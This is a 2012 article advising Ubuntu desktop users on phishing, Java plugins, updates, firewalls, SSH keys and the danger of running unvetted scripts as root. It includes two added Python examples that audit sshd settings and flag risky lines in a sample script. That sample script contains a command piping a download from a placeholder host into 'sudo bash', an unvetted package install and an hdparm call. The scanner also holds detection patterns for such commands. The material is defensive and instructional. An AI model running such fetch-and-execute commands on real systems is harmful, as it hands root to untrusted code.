
Protecting Your Ubuntu Desktop

By Matt Hartley
October 22, 2012

With all the talk recently about Ubuntu's use of Dash ads and the various new features offered, I find it interesting that security is virtually being ignored.

This isn't to say that articles about Ubuntu security don't exist, rather that we don't see a lot of articles in the mainstream tech circles talking about Ubuntu security as a topic. In this article, I hope to address this shortcoming.

Linux malware

It amuses me whenever I read someone's comment stating that Linux is bulletproof and how their distribution of Linux is somehow immune to malware threats.

Anyone who has an understanding of how malware is spread realizes that no operating system is completely secure. Where newbies tend to get confused is in how malware affects different desktop platforms.

Windows, for example, has had a long history of battling malware threats. And while today's modern releases are more secure than in years past, malware protection is still generally recommended for most Windows users.

More recently, we've seen a number of security products being developed for Linux and OS X. What makes this completely pointless is that the “threats” these security suites are designed to tackle won't affect Linux-based installations.

In short, using an anti-virus scanner in Linux is only useful for protecting dual-boot systems that share files, or for the occasional file passed along via email or Dropbox. Outside of protecting “Windows-using co-workers,” we're simply not at a point yet where malware on the Linux desktop is the same kind of threat seen on Windows PCs.

However, this doesn't mean that Linux distros are completely safe from other attack vectors.

Security through obscurity isn't enough

With any sort of a Linux virus threat put on hold for the time being, there are still a number of key areas where your Ubuntu installation could be at risk for attack. But unlike other operating systems, malware likely to affect your system is going to come from the Web and not from an infected file.

Yes, there are and have been exceptions to this rule. But usually it's a poorly configured set of security practices that will land a Linux user in trouble.

One of the most common attacks I've seen affect Linux users is phishing. Instead of executing code on your machine, the attacker relies on the actions of the end user or target, who foolishly gives up critical login information that leads to a hacked account. Sometimes this could be through Facebook apps or even authorized applications on Twitter.

Similar attacks come from web-based code, including cross-site scripting, cross-site request forgeries, and other related exploits.

These attacks are easy enough to avoid for advanced Linux users, yet less security-savvy folks may want to rely on select browser add-ons to provide an added layer of safety. More on this later in this article.

Another common area of attack comes from not updating your Linux systems to the latest security patches, or simply leaving easy attack vectors such as your browser set to use Java or Flash automatically when prompted. The most dangerous of the two is the Java plugin for your browser, as this article points out.

Thanks to the cross-platform friendliness of Java, this is likely to become an increasing security threat to Linux users who aren't paying close attention to their browser configuration.

Good offense begins with a great defense

For the casual Ubuntu user, rootkits, trojans and network intrusion are unlikely scenarios.


This isn't to say that they won't ever be a threat for a desktop Linux user, rather that it's highly unlikely. Nevertheless, there are some basic security practices that should be made part of your routine.

Run Security Updates – Whether for Ubuntu or something else altogether, keep those security updates current.

Secure Ports – If you don't need a port open, close it. A great GUI firewall manager is Gufw.

SSH RSA keys – For the sake of sanity, don't use weak passwords when running SSH on your Ubuntu box. Over the course of a day, you'll find countless attacks on your SSH port trying to crack what might be a weak password setup. I recommend using RSA keys instead. This prevents an attacker from “cracking” into your SSH setup via a password exploit.

Minimize attacks – Even though simply using RSA keys will help better secure your SSH setup, adding DenyHosts to the mix is good advice. This will keep malicious users from hitting your system and eating up resources, plus it will keep your log file a lot smaller.

AdBlockers/NoScript Browser Add-ons – Add-ons such as NoScript or AdBlock Plus can help prevent JavaScript-related exploits from creating problems through your browser in the first place.
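Keys only stop password guessing once password logins are switched off in sshd_config, and the attempts the SSH and DenyHosts items describe show up as "Failed password" lines in /var/log/auth.log. The following check of both is an added example, not part of the original article; the function names, the sample config and the sample log lines are constructed for illustration.

```python
import re
from collections import Counter

# Constructed /etc/ssh/sshd_config: a key is in use, but password logins are still on.
SAMPLE_SSHD_CONFIG = """\
#PasswordAuthentication no
PasswordAuthentication yes
PermitRootLogin yes
"""

# Constructed /var/log/auth.log lines; the addresses are documentation ranges.
SAMPLE_AUTH_LOG = """\
Oct 22 03:14:01 desk sshd[2101]: Failed password for root from 203.0.113.7 port 40112 ssh2
Oct 22 03:14:03 desk sshd[2103]: Failed password for invalid user admin from 203.0.113.7 port 40120 ssh2
Oct 22 03:14:06 desk sshd[2105]: Failed password for invalid user test from 203.0.113.7 port 40131 ssh2
Oct 22 08:30:12 desk sshd[2450]: Failed password for alice from 198.51.100.20 port 51514 ssh2
Oct 22 08:30:20 desk sshd[2450]: Accepted publickey for alice from 198.51.100.20 port 51514 ssh2
""".splitlines()

FAILED = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?\S+ from (\S+) port \d+")

def effective_options(config_text):
    """Global sshd options, lower-cased; sshd keeps the first value it reads per keyword."""
    options = {}
    for raw in config_text.splitlines():
        parts = raw.strip().split(None, 1)
        if len(parts) < 2 or parts[0].startswith("#"):
            continue
        if parts[0].lower() == "match":
            break  # per-user/host overrides are out of scope for this check
        options.setdefault(parts[0].lower(), parts[1].strip().lower())
    return options

def audit_sshd(config_text):
    """Findings that leave password guessing possible even with keys installed."""
    opts, findings = effective_options(config_text), []
    if opts.get("passwordauthentication", "yes") != "no":  # OpenSSH default is yes
        findings.append("PasswordAuthentication is enabled")
    if opts.get("permitrootlogin") == "yes":
        findings.append("root may log in directly (PermitRootLogin yes)")
    return findings

def noisy_sources(log_lines, threshold=3):
    """Source addresses with at least `threshold` failed password attempts."""
    counts = Counter(m.group(1) for line in log_lines if (m := FAILED.search(line)))
    return {ip: n for ip, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    print(audit_sshd(SAMPLE_SSHD_CONFIG), noisy_sources(SAMPLE_AUTH_LOG))
```

On a live system, `sudo sshd -T` prints the configuration sshd will actually use, which is the authoritative source for the same check.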

There are countless additional things that can be done to further secure an Ubuntu installation, but these are the big things to consider. Now you may have noticed that I didn’t mention encryption of your home directory. For newbies, I'm against the idea of encrypting your home directory, simply because most people screw something up and lose their data.

For those set on encryption, however, my advice is to make a backup of your data BEFORE attempting to encrypt your home directory. Once you've done this, you can follow this guide to get you started in better securing your local home directory data.

Everything above will provide you with a solid primer for better securing your data and keeping yourself free from exploits. But there is one last consideration that is, perhaps, the biggest untapped threat yet.

Anything executable is dangerous

I realize it must sound paranoid to say that anything that can be executable on an Ubuntu installation is a potential risk. Yet when you stop to think about it, for new users, it absolutely is a massive risk being completely ignored.

From mystery Deb packages to unknown PPA repositories, unless these things have been vetted by a trusted source, you’re playing with fire.

Thus far we've been fortunate and no one has released a dangerous package to the Ubuntu-using masses. And if users simply stick to trusted software sources only, they will never experience a problem in this area.

But when you consider the vast amount of bash/python scripts and other little Ubuntu tweak-related hacks, it's clear that users need to pay close attention to what these changes are doing to their system. All one has to do is blindly grant root privileges to run a dangerous script or install malicious software, and the typical end user would be in real trouble.

Again, thus far nothing has gone horribly wrong…but this doesn't mean that this approach should continue to be encouraged. Instead, I strongly advise new users to only grab software from trusted sources. We know that trusted sources like the official Ubuntu repositories are safe to use. Though it might seem paranoid, for newbies I recommend sticking with this source exclusively for software.

Think I'm overstating how dangerous random scripts can be? Take a look at this list of very basic examples. All it takes is blindly allowing root privileges and it's game over.
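One way to read a downloaded script before granting it root is to list every line that adds a software source, installs an unvetted package, pipes a download into a shell, touches hdparm or asks for root. This is an added example, not part of the original article; the rule set is a heuristic chosen for this example, and the sample script, host names and PPA name are constructed placeholders.

```python
import re

# Constructed sample of a downloaded "tweak" script; hosts and PPA name are placeholders.
SAMPLE_SCRIPT = """\
#!/bin/bash
# Speed up your desktop!
sudo add-apt-repository -y ppa:example/unvetted
wget -q http://example.invalid/tweak.deb && sudo dpkg -i tweak.deb
curl -s http://example.invalid/setup.sh | sudo bash
sudo hdparm -B 255 /dev/sda
echo "done"
"""

# Heuristic rules (assumptions of this example): reason shown to the user, pattern that triggers it.
RULES = [
    ("adds a software source outside the official repositories",
     re.compile(r"\badd-apt-repository\b|/etc/apt/sources\.list")),
    ("installs a local .deb that no repository has vetted",
     re.compile(r"\bdpkg\s+(-i|--install)\b")),
    ("pipes downloaded code straight into a shell",
     re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|da|z)?sh\b")),
    ("changes drive parameters with hdparm", re.compile(r"\bhdparm\b")),
    ("runs with root privileges", re.compile(r"\b(sudo|gksudo|pkexec)\b")),
]

def review_script(text):
    """Return (line_number, line, [reasons]) for every line worth reading before running."""
    flagged = []
    for number, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank lines, comments and the shebang carry no commands
        reasons = [why for why, pattern in RULES if pattern.search(line)]
        if reasons:
            flagged.append((number, line, reasons))
    return flagged

if __name__ == "__main__":
    for number, line, reasons in review_script(SAMPLE_SCRIPT):
        print(f"line {number}: {line}")
        for why in reasons:
            print(f"    - {why}")
```

A clean result only means none of these patterns matched; it does not show that a script is safe.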

The biggest security threat out there

The biggest security threat to an Ubuntu installation isn't what we'd normally consider to be malware. No, the single most dangerous thing that can happen to your data is executing random code without fully grasping what it does.

Even something as benign as configuring hdparm incorrectly can go beyond what most malware can do – it can flat out ruin your hard drive if used improperly, though not visibly with immediate damage.

So, with the understanding of how important it is to be careful, the best security suite available for Ubuntu users will never be purchased from a store shelf. The best security is knowledge and the willingness to spend a little time reading up on how to properly secure your Ubuntu system.

By following the basic tips found under the “good offense” section above, odds are you won't ever have any security problems.



projects/security/ubuntusecurity.txt · Last modified: 2017/06/27 15:41 by 127.0.0.1